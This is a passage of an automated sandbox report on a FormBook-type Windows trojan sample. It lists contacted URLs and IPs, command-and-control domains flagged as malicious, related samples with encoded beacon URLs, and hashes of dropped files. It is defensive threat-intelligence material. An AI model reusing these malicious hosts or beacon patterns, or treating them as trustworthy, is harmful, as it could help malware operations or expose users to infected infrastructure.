                                                  		high
                                                  http://www.biomedika.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.luxbrand.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.happystories.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.ecosia.org/newtab/chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/picture/anva-zilv.pngchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.athousandwords.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.yanyangzhibo.comchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.bodyonline.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3debchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/js.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.losbravos.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.megaos.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.allprinting.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.methlab.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.qiyuezhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.huoyazhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.miaozhaozhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.naikuaizhibo.comchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/bl.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/header.fe363a40.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.electrocat.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.implantcentre.net/bindingchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.liguizhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.qilinzhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/picture/default_avatar.jpgOlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.anmozhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mzkd6gp5.topOlGIUOYUZW.exe, 00000009.00000002.3994960615.0000000000869000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.aguardiente.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.eurosupport.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.xiapizhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.kleenair.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.aicaozhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    104.21.16.1
                                                    		www.mzkd6gp5.topUnited States
                                                    		13335CLOUDFLARENETUStrue
                                                    47.83.1.90
                                                    		www.ripbgs.infoUnited States
                                                    		3209VODANETInternationalIP-BackboneofVodafoneDEtrue
                                                    192.64.119.109
                                                    		www.laduta.xyzUnited States
                                                    		22612NAMECHEAP-NETUStrue
                                                    172.65.235.97
                                                    		url.gname.netUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    188.114.96.3
                                                    		www.einpisalpace.shopEuropean Union
                                                    		13335CLOUDFLARENETUSfalse
                                                    192.186.58.31
                                                    		www.babyzhibo.netUnited States
                                                    		132721PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNLtrue
                                                    162.0.236.169
                                                    		www.explorevision.xyzCanada
                                                    		22612NAMECHEAP-NETUStrue

                                                    Private

                                                    IP
                                                    127.0.0.1

                                                    General Information

                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1589871
                                                    Start date and time:2025-01-13 09:32:27 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 9m 47s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Run name:Run with higher sleep bypass
                                                    Number of analysed new started processes analysed:9
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:1001-13.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@10/8
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 96%
                                                    • Number of executed functions: 45
                                                    • Number of non-executed functions: 304
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target OlGIUOYUZW.exe, PID 6724 because it is empty
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                    Simulations

                                                    Behavior and APIs

                                                    No simulations

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    104.21.16.1trow.exeGet hashmaliciousUnknownBrowse
                                                    • www.wifi4all.nl/
                                                    8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                    • www.rafconstrutora.online/0xli/
                                                    NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                    • www.kkpmoneysocial.top/86am/
                                                    JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                    47.83.1.90BDlwy8b7Km.exeGet hashmaliciousFormBookBrowse
                                                    • www.givvjn.info/wl3x/?94=IDH/sxYsqLulkbcslybjsGNv3NS6VvVpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeI9ZMZ+p0PiMQUF+eqUdc9aZVsWrUptbZMNnY=&TXVlY=nv6XU20pgPTDN0
                                                    k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                    • www.dkeqqi.info/1dyw/?cNPH=r4IIUaGg8Ysw6Z88K77s9M2UXGNuluWHvSk1OgU5mSYSbSsTUuuLMPChZLQsUTMX5ns6JDTUfCzdkiOd4VeD2v0HOFU0ImfoMqjgmv5MAgVZY7DuZfSFf9DemTdSFvne3C9WyBVTb1Eg&EtJTX=_JVX4ryxDRQpLJF
                                                    XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                    • www.givvjn.info/wl3x/?9F=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&wtE0B=1LjxZz
                                                    FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                    • www.cloijz.info/r4db/
                                                    KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                    • www.ripbgs.info/mheu/?SDC=9Pe/ezeaWCrzUAPBTcNIGLUigJjsMNJlR4gH1LxCPe/+YeL0Jf302cRtfT27tJhwI3isQtUK9KovoI0NPjbFDyYPKZnOU02C1XybnvkdM/orYwcMtw==&mH=CpePy0P
                                                    smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                    • www.cloijz.info/r4db/
                                                    1162-201.exeGet hashmaliciousFormBookBrowse
                                                    • www.ripbgs.info/hf4a/
                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                    • www.givvjn.info/nkmx/
                                                    QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                    • www.givvjn.info/nkmx/
                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                    • www.givvjn.info/nkmx/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    www.laduta.xyz1162-201.exeGet hashmaliciousFormBookBrowse
                                                    • 192.64.119.109
                                                    ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 192.64.119.109
                                                    url.gname.net1162-201.exeGet hashmaliciousFormBookBrowse
                                                    • 172.65.235.97
                                                    www.explorevision.xyz1162-201.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.236.169
                                                    www.einpisalpace.shopk9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.97.3
                                                    XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.97.3
                                                    1162-201.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    www.ripbgs.infoKcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                    • 47.83.1.90
                                                    1162-201.exeGet hashmaliciousFormBookBrowse
                                                    • 47.83.1.90
                                                    www.babyzhibo.net1162-201.exeGet hashmaliciousFormBookBrowse
                                                    • 192.186.58.31
                                                    www.mzkd6gp5.topqlG7x91YXH.exeGet hashmaliciousFormBookBrowse
                                                    • 104.21.80.1
                                                    1162-201.exeGet hashmaliciousFormBookBrowse
                                                    • 104.21.64.1
                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                    • 104.21.32.1
                                                    QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                    • 104.21.96.1
                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                    • 104.21.64.1
                                                    CJE003889.exeGet hashmaliciousFormBookBrowse
                                                    • 172.67.158.81

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    NAMECHEAP-NETUSQsBdpe1gK5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 199.192.23.123
                                                    rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                    • 199.192.23.123
                                                    plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                    • 199.192.21.169
                                                    5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                    • 199.192.23.123
                                                    5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.43.134
                                                    https://services221.com/mm/Get hashmaliciousHTMLPhisherBrowse
                                                    • 198.54.116.108
                                                    wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.43.134
                                                    OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.43.134
                                                    QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                    • 199.193.6.134
                                                    KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.236.169
                                                    CLOUDFLARENETUS24010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                    • 104.21.32.1
                                                    https://file2-cdn.creality.com/file/2e068bd90e233501c8036fb25c76e092/CrealityScan_win_3.3.4-20241030.exeGet hashmaliciousUnknownBrowse
                                                    • 162.159.61.3
                                                    g4.elfGet hashmaliciousUnknownBrowse
                                                    • 1.1.1.1
                                                    msit.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 104.21.6.116
                                                    tesr.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 104.21.90.18
                                                    WSLRT.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 172.67.134.197
                                                    msit.msiGet hashmaliciousLummaC StealerBrowse
                                                    • 172.67.134.197
                                                    Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    trow.exeGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.comGet hashmaliciousUnknownBrowse
                                                    • 104.17.25.14
                                                    VODANETInternationalIP-BackboneofVodafoneDE6.elfGet hashmaliciousUnknownBrowse
                                                    • 92.73.125.182
                                                    6.elfGet hashmaliciousUnknownBrowse
                                                    • 47.82.15.239
                                                    res.arm5.elfGet hashmaliciousUnknownBrowse
                                                    • 84.61.102.254
                                                    res.x86.elfGet hashmaliciousUnknownBrowse
                                                    • 178.9.17.19
                                                    BDlwy8b7Km.exeGet hashmaliciousFormBookBrowse
                                                    • 47.83.1.90
                                                    k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                    • 47.83.1.90
                                                    XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                    • 47.83.1.90
                                                    6.elfGet hashmaliciousUnknownBrowse
                                                    • 82.82.131.16
                                                    FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                    • 47.83.1.90
                                                    KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                    • 47.83.1.90

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Temp\721e5H878

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\chkntfs.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1239949490932863
                                                    Encrypted:false
                                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                    MD5:271D5F995996735B01672CF227C81C17
                                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\outbluffed

                                                    Download File
                                                    Process:C:\Users\user\Desktop\1001-13.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):290816
                                                    Entropy (8bit):7.991432774809332
                                                    Encrypted:true
                                                    SSDEEP:6144:VvexgKz5BrOSqOkEJ7BKFsggYr7jhBelkb+:hwJ/cSBY7jhBa
                                                    MD5:C94164C81A8AC55916BD6D1D84948B6C
                                                    SHA1:8FAA9CECF5CEA31E028C5AE0AD4D86E7B967EDB5
                                                    SHA-256:38F77F4F4E09D5B315DBCF8305A481A4D8A05CC2953E8B31656ACE46B48C41EE
                                                    SHA-512:23EF67F99545E9321D81A84F1EB3F8AFE077A166734CF81A345DBF76CB311DE530AD9D7739AFDD425FF938849A779D66C3A78192B0B541993A6322A391A60282
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:.h.JG1MA@UQ2.D1.ADUQ25J.1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADU.25JJ..OD.X...E}.`.=8A.:6^*3%8qQT$*^9a&0q@@$dX#a....X% TcLI_u25JD1MA=TX..*#.p!#.lRR.^..~56./...q!#.K...xQ*..<2Z.*#.MADUQ25J.tMA.TP2i.fMADUQ25J.1O@OTZ25.@1MADUQ25J.#MADEQ25:@1MA.UQ"5JD3MABUQ25JD1KADUQ25JDAIADWQ25JD1OA..Q2%JD!MADUA25ZD1MADUA25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ2.>!I9ADU.n1JD!MAD.U25ZD1MADUQ25JD1MAdUQR5JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADUQ25JD1MADU

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.421135474135097
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:1001-13.exe
                                                    File size:1'616'384 bytes
